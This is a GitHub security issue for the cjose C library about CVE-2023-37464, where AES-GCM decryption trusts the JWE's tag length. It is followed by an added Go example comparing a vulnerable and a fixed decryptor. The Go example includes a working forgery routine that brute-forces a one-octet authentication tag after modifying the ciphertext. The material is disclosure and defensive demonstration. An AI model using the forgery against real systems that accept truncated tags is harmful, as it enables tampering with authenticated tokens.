cisco / cjose

C library implementing the Javascript Object Signing and Encryption (JOSE)
MIT License

SECURITY VULNERABILITY: incorrect Authentication Tag length usage in AES GCM decryption #125

Open zandbelt opened 1 year ago

zandbelt commented 1 year ago

NOTE THAT AES GCM DECRYPTION IS SEVERELY BROKEN FOR ALL VERSIONS OF CJOSE < 0.6.2.2

The AES GCM decryption routine incorrectly uses the Tag length from the actual Authentication Tag provided in the JWE, see: https://github.com/cisco/cjose/blob/0.6.1/src/jwe.c#L1228-L1229:

  // set the expected GCM-mode authentication tag
  if (EVP_CIPHER_CTX_ctrl(ctx, CJOSE_EVP_CTRL_GCM_SET_TAG, jwe->enc_auth_tag.raw_len, jwe->enc_auth_tag.raw) != 1)

However, the spec https://datatracker.ietf.org/doc/html/rfc7518#section-4.7 says that a fixed length of 16 octets must be applied:

The requested size of the Authentication Tag output MUST be 128 bits, regardless of the key size.

Therefore this bug allows an attacker to provide a truncated Authentication Tag and to modify the JWE accordingly.

See also: CVE-2023-37464 and https://github.com/OpenIDC/cjose/security/advisories/GHSA-3rhg-3gf2-6xgj

zandbelt commented 1 year ago

A fix for this vulnerability is available in the 0.6.2.x maintenance release fork here: https://github.com/OpenIDC/cjose/releases/
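The following is an added example, not code from the issue thread or from cjose, written in Go because it needs only the standard library. It shows the two decryption policies side by side: a routine that, like cjose before 0.6.2.2, takes the tag length from the JWE and compares only that many bytes of the computed tag (OpenSSL's EVP_CTRL_GCM_SET_TAG accepts any length from 1 to 16 and EVP_DecryptFinal_ex then compares that prefix; the prefix comparison is simulated here on top of Go's Seal, since Go's own GCM refuses tags shorter than 12 bytes), and a routine that enforces the fixed 128-bit tag RFC 7518 section 4.7 requires. The forgery function carries out the attack the report describes: modify the ciphertext, present a one-octet tag, and try all 256 values. Key, IV, AAD and plaintext are constructed values; `jwePart`, `decryptTrustingTagLength`, `decryptFixedTagLength` and `forgeWithOneByteTag` are names chosen for this example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/subtle"
	"errors"
	"fmt"
)

// jwePart holds the pieces of a JWE that matter for AES-GCM content decryption.
// Constructed stand-in for this example, not cjose's own structure.
type jwePart struct {
	IV, AAD, Ciphertext, Tag []byte
}

func newGCM(key []byte) cipher.AEAD {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	aead, err := cipher.NewGCM(block) // 96-bit IV, 128-bit tag, as RFC 7518 requires
	if err != nil {
		panic(err)
	}
	return aead
}

// encryptJWE produces the ciphertext and the full 16-octet tag, like a conforming encryptor.
func encryptJWE(key, iv, aad, plaintext []byte) jwePart {
	out := newGCM(key).Seal(nil, iv, plaintext, aad)
	n := len(out) - 16
	return jwePart{IV: iv, AAD: aad, Ciphertext: out[:n], Tag: out[n:]}
}

// fullTagAndPlaintext recomputes the complete 16-octet GCM tag over an arbitrary
// (possibly attacker-modified) ciphertext plus AAD, and the plaintext it maps to,
// using only Seal: GCM is CTR mode plus a tag over the ciphertext, so sealing zeros
// yields the keystream, and re-sealing ciphertext XOR keystream yields that exact
// ciphertext together with its tag. This is the value OpenSSL compares a prefix of.
func fullTagAndPlaintext(key []byte, p jwePart) (plaintext, tag []byte) {
	aead := newGCM(key)
	n := len(p.Ciphertext)
	keystream := aead.Seal(nil, p.IV, make([]byte, n), p.AAD)[:n]
	plaintext = make([]byte, n)
	for i := range plaintext {
		plaintext[i] = p.Ciphertext[i] ^ keystream[i]
	}
	out := aead.Seal(nil, p.IV, plaintext, p.AAD)
	return plaintext, out[n:]
}

// decryptTrustingTagLength reproduces the flawed policy: the tag length is whatever
// the JWE carries (1..16, the range EVP_CTRL_GCM_SET_TAG accepts), and only that
// many octets of the computed tag are checked.
func decryptTrustingTagLength(key []byte, p jwePart) ([]byte, error) {
	if len(p.Tag) < 1 || len(p.Tag) > 16 {
		return nil, errors.New("invalid tag length")
	}
	plaintext, computed := fullTagAndPlaintext(key, p)
	if subtle.ConstantTimeCompare(computed[:len(p.Tag)], p.Tag) != 1 {
		return nil, errors.New("authentication failed")
	}
	return plaintext, nil
}

// decryptFixedTagLength enforces RFC 7518 section 4.7: the tag MUST be 128 bits.
func decryptFixedTagLength(key []byte, p jwePart) ([]byte, error) {
	if len(p.Tag) != 16 {
		return nil, errors.New("authentication tag must be exactly 16 octets")
	}
	sealed := append(append([]byte{}, p.Ciphertext...), p.Tag...)
	return newGCM(key).Open(nil, p.IV, sealed, p.AAD)
}

type decryptFn func(key []byte, p jwePart) ([]byte, error)

// forgeWithOneByteTag flips one ciphertext byte, replaces the tag with a single
// octet and tries all 256 values; reports whether any was accepted and after how many tries.
func forgeWithOneByteTag(key []byte, p jwePart, decrypt decryptFn) (accepted bool, attempts int) {
	forged := jwePart{IV: p.IV, AAD: p.AAD, Ciphertext: append([]byte{}, p.Ciphertext...)}
	forged.Ciphertext[0] ^= 0x01 // attacker's modification of the protected content
	for guess := 0; guess < 256; guess++ {
		forged.Tag = []byte{byte(guess)}
		attempts++
		if _, err := decrypt(key, forged); err == nil {
			return true, attempts
		}
	}
	return false, attempts
}

func main() {
	key := bytes.Repeat([]byte{0x11}, 32) // constructed A256GCM content key
	iv := bytes.Repeat([]byte{0x22}, 12)  // constructed IV
	p := encryptJWE(key, iv, []byte("constructed-aad"), []byte(`{"sub":"alice"}`))
	for name, fn := range map[string]decryptFn{"vulnerable": decryptTrustingTagLength, "fixed": decryptFixedTagLength} {
		ok, n := forgeWithOneByteTag(key, p, fn)
		fmt.Printf("%-10s forgery accepted=%v after %d attempts\n", name, ok, n)
	}
}
```

Under the trusting policy the forgery always lands within 256 attempts, because a one-octet tag leaves only 8 bits of authentication; under the fixed policy every attempt fails on the length check before any cryptography runs, which is the check the 0.6.2.2 fix adds. The same length check should be applied before EVP_CTRL_GCM_SET_TAG in any C code that takes the tag from untrusted input.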